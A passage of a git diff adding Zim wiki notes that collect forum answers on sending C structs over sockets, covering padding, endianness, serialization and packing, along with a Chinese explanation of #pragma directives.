||||
As an example:
|
||||
|
||||
Code:
|
||||
|
||||
struct Foo
|
||||
{
|
||||
char foo;
|
||||
int bar;
|
||||
};
|
||||
|
||||
sizeof(struct Foo) is not guaranteed to (and in real world will almost never) be equal to sizeof(char)+sizeof(int) due to those padding issues.
|
||||
|
||||
|
||||
Moreover, depending on the CPU architecture there are problems of endianness too (most or least significant byte first?).
|
||||
|
||||
|
||||
Re: Can I send a C struct to a socket?
|
||||
Listen to aks44.
|
||||
|
||||
I'll just add that, even if you use datatypes that you're sure all of your networked devices regard as the same bitsize (for example, I can't think of a current architecture that doesn't consider "char" to be 8 bits), same byte order (again, "char" and "unsigned char" relieve you of that worry), or padding, you absolutely, absolutely cannot send any "pointer" to another machine. For example, assume you have the following two struct definitions:
|
||||
|
||||
Code:
|
||||
|
||||
struct Something {
|
||||
char buf[8];
|
||||
}
|
||||
|
||||
struct SomethingPtr {
|
||||
struct Something *something;
|
||||
}
|
||||
|
||||
You can't do something like sending these two structs:
|
||||
|
||||
Code:
|
||||
|
||||
mySomething = {"text"};
|
||||
MySomethingPtr = {&mySomething};
|
||||
|
||||
The mySomething address on one machine is going to be completely different on the other machine. You have to do something people often call "flattening the struct". You replace that pointer field with something that indicates to the other machine that it needs to reinsert a pointer to the mySomething struct you previously sent over.
|
||||
|
||||
You may want to take a look at how Microsoft's COM "marshalls" data between processes. There are examples of flattening structs there.
|
||||
Last edited by j_g; November 15th, 2007 at 06:33 PM..
|
||||
|
||||
|
||||
Re: Can I send a C struct to a socket?
|
||||
Quote:
|
||||
Originally Posted by kknd View Post
|
||||
You will have to serialize the thing to send, and the receiver will need to reassemble the thing, very painfull.
|
||||
This is the correct way to do things. although I would not describe it as "painful". It's just another opportunity to code more.
|
||||
|
||||
Aks44 was also correct in that endianess (sp?) is a factor. If you are transferring data from an Intel architecture to a PPC (power PC) architecture, then you will need to accommodate that the bytes in the words are swapped. M$'s .NET and CORBA handle this automagically. You can also do it yourself with minor effort.
|
||||
|
||||
Back to the serialize/unserialize procedure... you will need to perform a__ deep-copy of your structure into a buffer__, and if applicable, indicate the size of the buffer and sizes of any variable-length fields within the same buffer.
|
||||
|
||||
Once this buffer is sent across the wire, the recipient should be able to parse through the received buffer to reconstruct the original data structure.
|
||||
|
||||
Re: Can I send a C struct to a socket?
|
||||
this code is to work between Linux ix86 systems, so I don't think I have that sort of problems. I'm glad to say that it was fairly painless. My structure has mostly char* fields, one int (a cast to (const char*) did the trick), and I created a function to convert a list to a string, so I can send it in a buffer.
|
||||
|
||||
It's nice to have so many good responses in a relative short amount of time, in a subject that has almost anything, if anything at all, to do with Ubuntu
|
||||
|
||||
Thanks
|
||||
__________________
|
||||
56
Zim/Programme/APUE/send_struct_through_socket/Endianness.txt
Normal file
@@ -0,0 +1,56 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T00:18:26+08:00
|
||||
|
||||
====== Endianness ======
|
||||
Created 星期日 05 六月 2011
|
||||
|
||||
Hi everyone,
|
||||
|
||||
I'm fighting with socket programming now and I've encountered a problem, which I don't know how to solve in a portable way. The task is simple : I need to send the array of 16 bytes over the network, receive it in a client application and parse it. I know, there are functions like htonl, htons and so one to use with uint16 and uint32. But what should I do with the chunks of data greater than that?
|
||||
|
||||
Thank you.
|
||||
|
||||
--------
|
||||
you say an array of 16 bytes. That doesnt really help. Endianness only matters fro things larger than a byte
|
||||
|
||||
if its really raw bytes then just send them, you will receive them just the same
|
||||
|
||||
It its really a struct you want to send it
|
||||
|
||||
struct msg
|
||||
{
|
||||
int foo;
|
||||
int bar;
|
||||
.....
|
||||
|
||||
Then you need to work through the buffer pulling that values you want.
|
||||
|
||||
When you send you must assemble a packet into a standard order
|
||||
|
||||
int off = 0;
|
||||
*(int*)&buff[off] = htonl(foo);
|
||||
off += sizeof(int);
|
||||
*(int*)&buff[off] = htonl(bar);
|
||||
...
|
||||
|
||||
when u receive
|
||||
|
||||
int foo = ntohl((int)buff[off]);
|
||||
off += sizeof(int);
|
||||
int bar = ntohl((int)buff[off]);
|
||||
....
|
||||
|
||||
edit : I see you want to send an IPv6 address, they are always in network byte order - so you can just stream it raw
|
||||
-----------------
|
||||
Endianness is a property of multibyte variables such as 16- and 32-but integers; it has to do with whether the high-order or low-order byte goes first. If the client application is processing the array as individual bytes, it doesn't have to worry about endianness, as the order of the bits within the bytes is the same.
|
||||
|
||||
----------------
|
||||
htons, htonl, etc., are for dealing with a single data item (e.g. an int) that's larger than one byte. An array of bytes where each one is used as a single data item itself (e.g., a string) doesn't need to be translated between host and network byte order at all.
|
||||
|
||||
------------------
|
||||
Bytes themselves don't have endianness any more in that any single byte transmitted by a computer will have the same value in a different receiving computer. Endianness only has relevance these days to multibyte data types such as ints.
|
||||
|
||||
In your particular case it boils down to knowing what the receiver will do with your 16 bytes. If it will treat each of the 16 entries in the array as discrete single byte values then you can just send them without worrying about endiannes. If, on the other hand, the receiver will treat your 16 byte array as four 32 bit integers then you'll need to run each integer through hton() prior to sending.
|
||||
|
||||
Does that help?
|
||||
@@ -0,0 +1,40 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T00:09:05+08:00
|
||||
|
||||
====== How to send an integer through a socket ======
|
||||
Created 星期日 05 六月 2011
|
||||
|
||||
I am trying to send an integer through a socket. I am using this code to do so; however, my C code will not compile. The compiler complains that myInt has not been declared.
|
||||
|
||||
int tmp = htonl(myInt);
|
||||
write(socket, &tmp, sizeof(tmp));
|
||||
|
||||
How do I declare myInt? Thanks.
|
||||
|
||||
------------
|
||||
Are you sure that it was properly declared in your program ?
|
||||
|
||||
Try like this:
|
||||
|
||||
int myInt = something;
|
||||
int tmp = htonl((uint32_t)myInt);
|
||||
write(socket, &tmp, sizeof(tmp));
|
||||
|
||||
-------------
|
||||
One simple solution is __typecase the integer to char and send 4bytes of the char buffer__
|
||||
|
||||
int myInt char * ptr = &myInt; write(socket, ptr, sizeof(int));
|
||||
|
||||
at the recieving end read the 4bytes.. u wont have any problem with the endianess.
|
||||
link|edit|flag
|
||||
|
||||
answered May 1 at 20:17
|
||||
maheshgupta024
|
||||
824
|
||||
|
||||
1
|
||||
|
||||
You certainly will have endian-ness problems if the two hosts are of different endian-ness. – Andrew Medico May 1 at 20:20
|
||||
|
||||
@maheshgupta024 - I think what you meant was to convert the integer to a textual representation (Such as you would see in XML or JSON). The problem is what you just posted ... doesn't do that. You'd need to use sprintf() for example to do the conversion. – Brian Roach May 1 at 20:36
|
||||
@@ -0,0 +1,72 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T16:11:43+08:00
|
||||
|
||||
====== Send a struct over a socket with correct padding and endianness in C ======
|
||||
Created 星期日 05 六月 2011
|
||||
|
||||
I have several structures defined to send over different Operating Systems (tcp networks). Defined structures are:
|
||||
|
||||
struct Struct1 { uint32_t num; char str[10]; char str2[10];}
|
||||
struct Struct2 { uint16_t num; char str[10];}
|
||||
|
||||
typedef Struct1 a;
|
||||
typedef Struct2 b;
|
||||
|
||||
The data is stored in a text file. Data Format is as such:
|
||||
|
||||
123
|
||||
Pie
|
||||
Crust
|
||||
|
||||
Struct1 a is stored as 3 separate parameters. However, struct2 is two separate parameters with both 2nd and 3rd line stored to the char str[] . The problem is when I write to a server over the multiple networks, the data is not received correctly. There are numerous spaces that separate the different parameters in the structures. How do I ensure proper sending and padding when I write to server? How do I store the data correctly (dynamic buffer or fixed buffer)?
|
||||
|
||||
Example of write: write(fd,&a, sizeof(typedef struct a)); Is this correct?
|
||||
|
||||
Problem Receive Side Output for struct2:
|
||||
|
||||
123( , )
|
||||
0 (, Pie)
|
||||
0 (Crust,)
|
||||
|
||||
Correct Output
|
||||
|
||||
123(Pie, Crust)
|
||||
------------------------
|
||||
write(fd,&a, sizeof(a)); is not correct; at least not portably, since the C compiler may introduce padding between the elements to ensure correct alignment. sizeof(typedef struct a) doesn't even make sense.
|
||||
|
||||
How you should send the data depends on the specs of your protocol. In particular, protocols define widely varying ways of sending strings. It is generally safest to send the struct members separately; either by multiple calls to write or writev(2). For instance, to send
|
||||
|
||||
struct { uint32_t a; uint16_t b; } foo;
|
||||
|
||||
over the network, where foo.a and foo.b already have the correct endianness, you would do something like:
|
||||
|
||||
struct iovec v[2];
|
||||
v[0].iov_base = &foo.a;
|
||||
v[0].iov_len = sizeof(uint32_t);
|
||||
v[1].iov_base = &foo.b;
|
||||
v[1].iov_len = sizeof(uint16_t);
|
||||
writev(fp, v, 2);
|
||||
|
||||
------------------
|
||||
1 down vote
|
||||
|
||||
|
||||
Sending structures over the network is tricky. The following problems you might have
|
||||
|
||||
Byte endiannes issues with integers.
|
||||
Padding introduced by your compiler.
|
||||
String parsing (i.e. detecting string boundaries).
|
||||
|
||||
If performance is not your goal, I'd suggest to create encoders and decoders for each struct to be send and received (ASN.1, XML or custom). If performance is really required you can still use structures and solve (1), by fixing an endianness (i.e. network byte order) and ensure your integers are stored as such in those structures, and (2) by fixing a compiler and using the pragmas or attributes to enforce a "packed" structure.
|
||||
|
||||
Gcc for example uses attribute((packed)) as such:
|
||||
|
||||
struct mystruct {
|
||||
uint32_t a;
|
||||
uint16_t b;
|
||||
unsigned char text[24];
|
||||
} __attribute__((__packed__));
|
||||
|
||||
(3) is not easy to solve. Using null terminated strings at a network protocol and depending on them being present would make your code vulnerable to several attacks. If strings need to be involved I'd use an proper encoding method such as the ones suggested above.
|
||||
----------------------
|
||||
@@ -0,0 +1,54 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T23:02:43+08:00
|
||||
|
||||
====== Sending Structured Data ======
|
||||
Created 星期六 04 六月 2011
|
||||
Hey,
|
||||
I thought it was incredibly cool that I could send in a structure over using send(2) and not have to parse a single string in both my client and server. So I thought I'd share, as I saw someone was using strings and was asking about "\r\n", I'm sure it's not hard to figure out as we were sending over integers in our labs anyway.
|
||||
|
||||
Quote:
|
||||
|
||||
// Please note that I just wrote this here, it's not a part of my actual code – you may use this idea:
|
||||
|
||||
typedef struct Data {
|
||||
char message[140];
|
||||
int type;
|
||||
} Data;
|
||||
|
||||
/* You can use send(2) to send over a copy of your structure
|
||||
and receive it using recv(2): */
|
||||
|
||||
// send:
|
||||
Data data;
|
||||
sprintf(data.message, "Hello, I'm Nima");
|
||||
data.type = 0x01;
|
||||
|
||||
int sent = send(sock, &data, sizeof(Data), 0);
|
||||
|
||||
// recv:
|
||||
|
||||
Data data;
|
||||
memset(&data, 0, sizeof(Data));
|
||||
int recved = recv(sock, &data, sizeof(Data), 0);
|
||||
|
||||
I love C.
|
||||
Back to top
|
||||
|
||||
« Last Edit: Dec 8th, 2010, 3:34am by Nimsical »
|
||||
WWW IP Logged
|
||||
reid
|
||||
Global Moderator
|
||||
Instructor
|
||||
*****
|
||||
|
||||
|
||||
|
||||
|
||||
Posts: 933
|
||||
|
||||
Show the link to this post Re: Sending Structured Data
|
||||
Reply #1 - Dec 8th, 2010, 9:49am
|
||||
Nice.
|
||||
|
||||
The problem with sending structured data is that you need to be careful about byte ordering. This will work fine as long as the two machines have the same byte order. I think it will work more generally if you convert the int to network byte order and back.
|
||||
@@ -0,0 +1,69 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T15:55:37+08:00
|
||||
|
||||
====== Sending struct over TCP (C-programming) ======
|
||||
Created 星期日 05 六月 2011
|
||||
|
||||
Hi again!
|
||||
|
||||
I have a client and server program where I want to send an entire struct from the client and then output the struct member "ID" on the server.
|
||||
|
||||
I have done all the connecting etc and already managed to send a string through:
|
||||
|
||||
send(socket, string, string_size, 0);
|
||||
|
||||
So, is it possible to send a struct instead of a string through send()? Can I just replace my buffer on the server to be an empty struct of the same type and go?
|
||||
|
||||
-----------------
|
||||
Welll... sending structs through the network is kinda hard if you are doing it properly.
|
||||
|
||||
Carl is right - you can send a struct through a network by saying:
|
||||
|
||||
send(socket, (char*)my_struct, sizeof(my_struct), 0);
|
||||
|
||||
But here's the thing:
|
||||
|
||||
sizeof(my_struct) might change between the client and server. Compilers often do some amount of padding and alignment, so unless you define alignment explicitly (maybe using a #pragma pack()), that size may be different.
|
||||
The other problem tends to be byte-order. Some machines are big-endian and others are little-endian, so the arrangement of the bytes might be different. In reality, unless your server or client is running on non-Intel hardware (which is probably not the case) then this problem exists more in theory than in practice.
|
||||
|
||||
So the solution people often propose is to have a routine that **serializes the struct**. That is, it __sends the struct one data member at a time__, ensuring that the client and server only send() and recv() the exact specified number of bytes that you code into your program.
|
||||
|
||||
-------------
|
||||
Serialization
|
||||
|
||||
It is often necessary to send or receive complex datastructures to or from another program that may run on a different architecture or may have been designed for different version of the datastructures in question. A typical example is a program that saves its state to a file on exit and then reads it back when started.
|
||||
|
||||
The 'send' function will typically start by writing a magic identifier and version to the file or network socket and then proceed to write all the data members one by one (i.e. in serial). If variable length arrays are encountered (e.g. strings), it will either write a length followed by the data or it will write the data followed by a special terminator. The format is often XML or binary in which case the htonl() set of macros may come in handy.
|
||||
|
||||
The 'receive' function will be nearly identical : It will read all the items on by one. Variable length arrays are either handled by reading the count followed by the data, or by reading the data until the special terminator is reached.
|
||||
|
||||
Since these two functions often follow the same pattern as the declaration of the data(structures), it would be nice if they could all be generated from a common definition.
|
||||
----------
|
||||
Not that it matters very much, but you should probably cast the structure to a void*, rather than a char *, since that's what send() is prototyped to take. – Mark Bessey Nov 14 '09 at 17:51
|
||||
|
||||
@rasher: While you mention both packing the struct and serializing, it's important to point out that serializing can murder performance if you're sending a high volume of data. Every call to send causes a fairly expensive context switch between user space and kernel space. __Packing the data is really the preferred method__.
|
||||
------------------
|
||||
Are the client and server machines "the same"? What you are proposing will only work if the the C compilers at each end lay out the structure in memory exactly the same. There are lots of reasons why this may not be the case. For example the client and server macines might have different architectures, then the way they represent numbers in memory (big-endian, little-endian) might differ. Even if the clients machines and server machine have the same architecture two different C compilers may have different policies for how they lay out structs in memory (eg. padding between fields to align ints on word boundaries). Even the same conmpiler with different flags might give different results.
|
||||
|
||||
Pragmatically, I'm guessing that your client and server are the same kind of machine and so what you are proposing will work, however you need to be aware that as a general rule it won't and that's why standards such as CORBA were invented, or why folks use some general representation such as XML
|
||||
---------------
|
||||
You can, if the client and the server have laid out the struct exactly the same way, meaning that the fields are all the same size, with the same padding. For instance if you have a long in your struct, that might be 32bits on one machine and 64bits on the other, in which case the struct will not be received correctly.
|
||||
|
||||
In your case, if the client and the server are always going to be on very similar C implementations (for instance if this is just code you're using to learn some basic concepts, or if for some other reason you know your code will only ever have to run on your current version of OSX), then you can probably get away with it. Just remember that your code will not necessarily work properly on other platforms, and that there's more work to do before it's suitable for use in most real-world situations.
|
||||
|
||||
For most client-server applications, this means that the answer is you can't do it in general. What you actually do is define the message in terms of the number of bytes sent, what order, what they mean, and so on. Then at each end, you do something platform-specific to ensure that the struct you're using has exactly the required layout. Even so, you might have to do some byte-swapping if you're sending integer members of the struct little-endian, and then you want your code to run on a big-endian machine. Data interchange formats like XML, json and Google's protocol buffers exist so that you don't have to do this fiddly stuff.
|
||||
|
||||
[Edit: also remember of course that some struct members can never be sent over the wire. For instance if your struct has a pointer in it, then the address refers to memory on the sending machine, and is useless on the receiving end. Apologies if this is already obvious to you, but it certainly isn't obvious to everyone when they're just beginning with C].
|
||||
|
||||
-------------
|
||||
Technically, the struct will always be received correctly assuming his protocol over the connection works correctly. The problem is not the receiving, it is the interpreting or perhaps you might call it the accessing.
|
||||
------------
|
||||
True. I'd say if you don't actually read all the bytes into application space (because sizeof(thestruct) is smaller on the reader than the writer), then you haven't received the message. Also, I think technically it is sometimes undefined behavior to copy arbitrary bytes over a struct - you could trigger trap bits in the members. So in that case too the message is not received. But you're right, you'll receive (some of) the bytes of the message, just not understand the message itself.
|
||||
------------------
|
||||
In general, it's a bad idea to do this, even if your client and your server turn out to lay out the structure in memory the same way.
|
||||
|
||||
Even if you don't intend to pass more complex data structures (that would involve pointers) back and forth, I recommend that you serialize your data before you send it over the network.
|
||||
----------------------
|
||||
Send the data as text file and then decode it after receiving it. This is the best way if you want your data as its sent!!
|
||||
|
||||
@@ -0,0 +1,44 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T16:07:02+08:00
|
||||
|
||||
====== structure padding and structure packing ======
|
||||
Created 星期日 05 六月 2011
|
||||
|
||||
struct mystruct_A
|
||||
{
|
||||
char a;
|
||||
int b;
|
||||
char c;
|
||||
}x;
|
||||
|
||||
struct mystruct_B
|
||||
{
|
||||
int b;
|
||||
char a;
|
||||
}y;
|
||||
|
||||
the size of structure is 12 and 8 respectively...is this structure padding or packing...can any one tell me when padding takes and packing takes...is this structure padded or packing..??
|
||||
|
||||
------------
|
||||
Padding aligns structure members to "natural" address boundaries - say, int members would have offsets, which are mod(4) == 0 on 32-bit platform. Padding is on by default. It inserts the following "gaps" into your first structure:
|
||||
|
||||
struct mystruct_A {
|
||||
char a;
|
||||
char gap_0[3]; /* inserted by compiler: for alignment of b */
|
||||
int b;
|
||||
char c;
|
||||
char gap_1[3]; /* -"-: for alignment of the whole struct in an array */
|
||||
} x;
|
||||
|
||||
Packing, on the other hand prevents compiler from doing padding - this has to be explicitly requested - under GCC it's __attribute__((__packed__)), so the following:
|
||||
|
||||
struct __attribute__((__packed__)) mystruct_A {
|
||||
char a;
|
||||
int b;
|
||||
char c;
|
||||
};
|
||||
|
||||
would produce structure of size 6 on a 32-bit architecture.
|
||||
|
||||
A note though - unaligned memory access is slower on architectures that allow it (like x86 and amd64), and is explicitly prohibited on strict alignment architectures like SPARC.
|
||||
@@ -0,0 +1,49 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T15:14:03+08:00
|
||||
|
||||
====== Sending variable size arrays from client to server ======
|
||||
Created 星期日 05 六月 2011
|
||||
I'm in a peculiar situation, maybe somebody could offer some advice.
|
||||
|
||||
I'm using ENet as my main mode of client/server communications at the moment, and have been able to successfully send basic structs back and forth for quite some time.
|
||||
|
||||
I am now in the position, however, in which I need to send variable-sized arrays back and forth between these two machines. I'd like to store this information in a struct, as sending and receiving structs has been pretty easy so far. Sending structs with variable-sized arrays in them appears to be a lot different, though.
|
||||
|
||||
Do I need to use some kind of object serialization or is there a simpler way to do this that I haven't discovered yet?
|
||||
|
||||
The basic idea of the struct I need to send is as follows:
|
||||
|
||||
typedef struct _StructName
|
||||
{
|
||||
int arr_size;
|
||||
int arr[];
|
||||
} StructName;
|
||||
|
||||
|
||||
|
||||
Thanks in advance for any help or suggestions.
|
||||
-----------------
|
||||
Structs are fixed-size, and you want to send a variable sized object, so no, you can't do it that way.
|
||||
|
||||
The typical solution is simply this:
|
||||
|
||||
Sender: send number of elements, then each element in turn.
|
||||
Receiver: read number of elements, then read that many elements in turn.
|
||||
|
||||
I'm assuming you already have a method for determining which object type you're about to receive.
|
||||
----------------------
|
||||
Yes, you need to serialize your array somehow. A prefix length followed by the data is common. (You don't need to go full stateless object network serialization, though, just serializing this particular type would be fine)
|
||||
-------------------------
|
||||
Rather than being terribly specific at this hour, I thought I'd give a handful of random advice --
|
||||
|
||||
Firstly, be aware of struct padding and packing; become familiar with your compiler's "packing" directive. Using Microsoft's compiler, I believe it's goes something like #pragma pack(push) #pragma pack(1) <struct definitions> <pragma pack(pop). Eventually you'll have to implement proper serialization for versioning and portability, but until then you can at least avoid sending padding bytes. Also, order your data from the largest datatype down in your structs (and be aware that is the order the variables are initialized in if you have constructors with parameter lists. Keep in mind that such "unnatural" alignment makes the structs less performant to access, so it's probably worth having a packed version for network transmission, and an unpacked version to perform calculations against.
|
||||
|
||||
When you do get to serialization, you can send data very efficiently -- say, packing a value of 1-50 in 6 bits, or a Boolean value in just 1. Or maybe by compressing the message payload. It takes some work to extract, but in general you're going to expect to get about 10 full network updates over the WWW per second, and the clients have what is effectively forever to decode messages.
|
||||
|
||||
The Decorator pattern is very useful in building up packets or file IO, look into it.
|
||||
|
||||
Message size is somewhat of a trade-off against latency -- that is, the longer you spend waiting for enough data to fill a message to the brim, its that much longer the receiver has to wait for fresh data. It may be worth implementing some kind of timer that will cut off the current message if its been waiting around too long.
|
||||
|
||||
Most systems use two primary streams, on UDP-based for fast-paced game data, and a second TCP-based for data which is not time-sensitive, such as chat text, score updates, etc.
|
||||
|
||||
155
Zim/Programme/APUE/send_struct_through_socket/pragma.txt
Normal file
@@ -0,0 +1,155 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T12:32:12+08:00
|
||||
|
||||
====== pragma ======
|
||||
Created 星期日 05 六月 2011
|
||||
#pragma
|
||||
百科名片
|
||||
|
||||
在所有的预处理指令中,#Pragma 指令可能是最复杂的了,它的作用是设定编译器的状态或者是指示编译器完成一些特定的动作。#pragma指令对每个编译器给出了一个方法,在保持与C和C++语言完全兼容的情况下,给出主机或操作系统专有的特征。依据定义,编译指示是机器或操作系统专有的,且对于每个编译器都是不同的。
|
||||
|
||||
目录
|
||||
|
||||
一般格式
|
||||
常用参数
|
||||
应用实例
|
||||
展开
|
||||
|
||||
编辑本段一般格式
|
||||
其格式一般为: #Pragma Para。其中Para 为参数,下面来看一些常用的参数
|
||||
编辑本段常用参数
|
||||
|
||||
[#pragma]
|
||||
|
||||
#pragma
|
||||
message 参数
|
||||
Message 参数能够在编译信息输出窗口中输出相应的信息,这对于源代码信息的控制是非常重要的。其使用方法为:
|
||||
#Pragma message(“消息文本”)
|
||||
当编译器遇到这条指令时就在编译输出窗口中将消息文本打印出来。
|
||||
当我们在程序中定义了许多宏来控制源代码版本的时候,我们自己有可能都会忘记有没有正确的设置这些宏,此时我们可以用这条指令在编译的时候就进行检查。假设我们希望判断自己有没有在源代码的什么地方定义了_X86这个宏可以用下面的方法
|
||||
#ifdef _X86
|
||||
#Pragma message(“_X86 macro activated!”)
|
||||
#endif
|
||||
当我们定义了_X86这个宏以后,应用程序在编译时就会在编译输出窗口里显示“_X86 macro activated!”。我们就不会因为不记得自己定义的一些特定的宏而抓耳挠腮了。
|
||||
code_seg
|
||||
另一个使用得比较多的pragma参数是code_seg。格式如:
|
||||
#pragma code_seg( ["section-name"[,"section-class"] ] )
|
||||
它能够设置程序中函数代码存放的代码段,当我们开发驱动程序的时候就会使用到它。
|
||||
#pragma once
|
||||
(比较常用)
|
||||
只要在头文件的最开始加入这条指令就能够保证头文件被编译一次,这条指令实际上在VC6中就已经有了,但是考虑到兼容性并没有太多的使用它。
|
||||
#pragma once是编译相关,就是说这个编译系统上能用,但在其他编译系统不一定可以,也就是说移植性差,不过现在基本上已经是每个编译器都有这个定义了。
|
||||
#ifndef,#define,#endif这个是C++语言相关,这是C++语言中的宏定义,通过宏定义避免文件多次编译。所以在所有支持C++语言的编译器上都是有效的,如果写的程序要跨平台,最好使用这种方式
|
||||
#pragma hdrstop
|
||||
#pragma hdrstop表示预编译头文件到此为止,后面的头文件不进行预编译。BCB可以预编译头文件以加快链接的速度,但如果所有头文件都进行预编译又可能占太多磁盘空间,所以使用这个选项排除一些头文件。
|
||||
有时单元之间有依赖关系,比如单元A依赖单元B,所以单元B要先于单元A编译。你可以用#pragma startup指定编译优先级,如果使用了#pragma package(smart_init) ,BCB就会根据优先级的大小先后编译。
|
||||
#pragma resource
|
||||
#pragma resource "*.dfm"表示把*.dfm文件中的资源加入工程。*.dfm中包括窗体外观的定义。
|
||||
#pragma warning
|
||||
#pragma warning( disable : 4507 34; once : 4385; error : 164 )
|
||||
等价于:
|
||||
#pragma warning(disable:4507 34) // 不显示4507和34号警告信息
|
||||
#pragma warning(once:4385) // 4385号警告信息仅报告一次
|
||||
#pragma warning(error:164) // 把164号警告信息作为一个错误。
|
||||
同时这个pragma warning 也支持如下格式:
|
||||
#pragma warning( push [ ,n ] )
|
||||
#pragma warning( pop )
|
||||
这里n代表一个警告等级(1---4)。
|
||||
#pragma warning( push )保存所有警告信息的现有的警告状态。
|
||||
#pragma warning( push, n)保存所有警告信息的现有的警告状态,并且把全局警告等级设定为n。
|
||||
#pragma warning( pop )向栈中弹出最后一个警告信息,
|
||||
在入栈和出栈之间所作的一切改动取消。例如:
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4705 )
|
||||
#pragma warning( disable : 4706 )
|
||||
#pragma warning( disable : 4707 )
|
||||
//.......
|
||||
#pragma warning( pop )
|
||||
在这段代码的最后,重新保存所有的警告信息(包括4705,4706和4707)。
|
||||
pragma comment
|
||||
pragma comment(...)
|
||||
该指令将一个注释记录放入一个对象文件或可执行文件中。
|
||||
常用的lib关键字,可以帮我们连入一个库文件。
|
||||
每个编译程序可以用#pragma指令激活或终止该编译程序支持的一些编译功能。例如,对循环优化功能:
|
||||
#pragma loop_opt(on) // 激活
|
||||
#pragma loop_opt(off) // 终止
|
||||
有时,程序中会有些函数会使编译器发出你熟知而想忽略的警告,如“Parameter xxx is never used in function xxx”,可以这样:
|
||||
#pragma warn —100 // Turn off the warning message for warning #100
|
||||
int insert_record(REC *r)
|
||||
{ /* function body */ }
|
||||
#pragma warn +100 // Turn the warning message for warning #100 back on
|
||||
函数会产生一条有唯一特征码100的警告信息,如此可暂时终止该警告。
|
||||
每个编译器对#pragma的实现不同,在一个编译器中有效在别的编译器中几乎无效。可从编译器的文档中查看。
|
||||
#pragma pack(n)和#pragma pack()
|
||||
struct sample
|
||||
{
|
||||
char a;
|
||||
double b;
|
||||
};
|
||||
当sample结构没有加#pragma pack(n)的时候,sample按最大的成员那个对齐;
|
||||
(所谓的对齐是指对齐数为n时,对每个成员进行对齐,既如果成员a的大小小于n则将a扩大到n个大小;
|
||||
如果a的大小大于n则使用a的大小;)所以上面那个结构的大小为16字节.
|
||||
当sample结构加#pragma pack(1)的时候,sizeof(sample)=9字节;无空字节。
|
||||
(另注:当n大于sample结构的最大成员的大小时,n取最大成员的大小。
|
||||
所以当n越大时,结构的速度越快,大小越大;反之则)
|
||||
#pragma pack()就是取消#pragma pack(n)的意思了,也就是说接下来的结构不用#pragma pack(n)
|
||||
#pragma comment( comment-type ,["commentstring"] )
|
||||
comment-type是一个预定义的标识符,指定注释的类型,应该是compiler,exestr,lib,linker之一。
|
||||
commentstring是一个提供为comment-type提供附加信息的字符串。
|
||||
注释类型:
|
||||
1、compiler:
|
||||
放置编译器的版本或者名字到一个对象文件,该选项是被linker忽略的。
|
||||
2、exestr:
|
||||
在以后的版本将被取消。
|
||||
3、lib:
|
||||
放置一个库搜索记录到对象文件中,这个类型应该是和commentstring(指定你要Linker搜索的lib的名称和路径)这个库的名字放在Object文件的默认库搜索记录的后面,linker搜索这个这个库就像你在命令行输入这个命令一样。你可以在一个源文件中设置多个库记录,它们在object文件中的顺序和在源文件中的顺序一样。如果默认库和附加库的次序是需要区别的,使用Z编译开关是防止默认库放到object模块。
|
||||
4、linker:
|
||||
指定一个连接选项,这样就不用在命令行输入或者在开发环境中设置了。
|
||||
只有下面的linker选项能被传给Linker.
|
||||
/DEFAULTLIB ,/EXPORT,/INCLUDE,/MANIFESTDEPENDENCY, /MERGE,/SECTION
|
||||
(1) /DEFAULTLIB:library
|
||||
/DEFAULTLIB 选项将一个 library 添加到 LINK 在解析引用时搜索的库列表。用 /DEFAULTLIB指定的库在命令行上指定的库之后和 .obj 文件中指定的默认库之前被搜索。忽略所有默认库 (/NODEFAULTLIB) 选项重写 /DEFAULTLIB:library。如果在两者中指定了相同的 library 名称,忽略库 (/NODEFAULTLIB:library) 选项将重写 /DEFAULTLIB:library。
|
||||
(2)/EXPORT:entryname[,@ordinal[,NONAME]][,DATA]
|
||||
使用该选项,可以从程序导出函数,以便其他程序可以调用该函数。也可以导出数据。通常在 DLL 中定义导出。entryname 是调用程序要使用的函数或数据项的名称。ordinal 在导出表中指定范围在 1 至 65,535 的索引;如果没有指定 ordinal,则 LINK 将分配一个。NONAME 关键字只将函数导出为序号,没有 entryname。
|
||||
DATA 关键字指定导出项为数据项。客户程序中的数据项必须用 extern __declspec(dllimport) 来声明。
|
||||
有三种导出定义的方法,按照建议的使用顺序依次为:
|
||||
源代码中的 __declspec(dllexport).def 文件中的 EXPORTS 语句LINK 命令中的 /EXPORT 规范所有这三种方法可以用在同一个程序中。LINK 在生成包含导出的程序时还创建导入库,除非生成中使用了 .exp 文件。
|
||||
LINK 使用标识符的修饰形式。编译器在创建 .obj 文件时修饰标识符。如果 entryname 以其未修饰的形式指定给链接器(与其在源代码中一样),则 LINK 将试图匹配该名称。如果无法找到唯一的匹配名称,则 LINK 发出错误信息。当需要将标识符指定给链接器时,请使用 Dumpbin 工具获取该标识符的修饰名形式。
|
||||
(3)/INCLUDE:symbol
|
||||
/INCLUDE 选项通知链接器将指定的符号添加到符号表。
|
||||
若要指定多个符号,请在符号名称之间键入逗号 (,)、分号 (;) 或空格。在命令行上,对每个符号指定一次 /INCLUDE:symbol。
|
||||
链接器通过将包含符号定义的对象添加到程序来解析 symbol。该功能对于添包含不会链接到程序的库对象非常有用。用该选项指定符号将通过 /OPT:REF 重写该符号的移除。
|
||||
我们经常用到的是#pragma comment(lib,"*.lib")这类的。#pragma comment(lib,"Ws2_32.lib")表示链接Ws2_32.lib这个库。 和在工程设置里写上链入Ws2_32.lib的效果一样,不过这种方法写的 程序别人在使用你的代码的时候就不用再设置工程settings了
|
||||
编辑本段应用实例
|
||||
在网络协议编程中,经常会处理不同协议的数据报文。一种方法是通过指针偏移的
|
||||
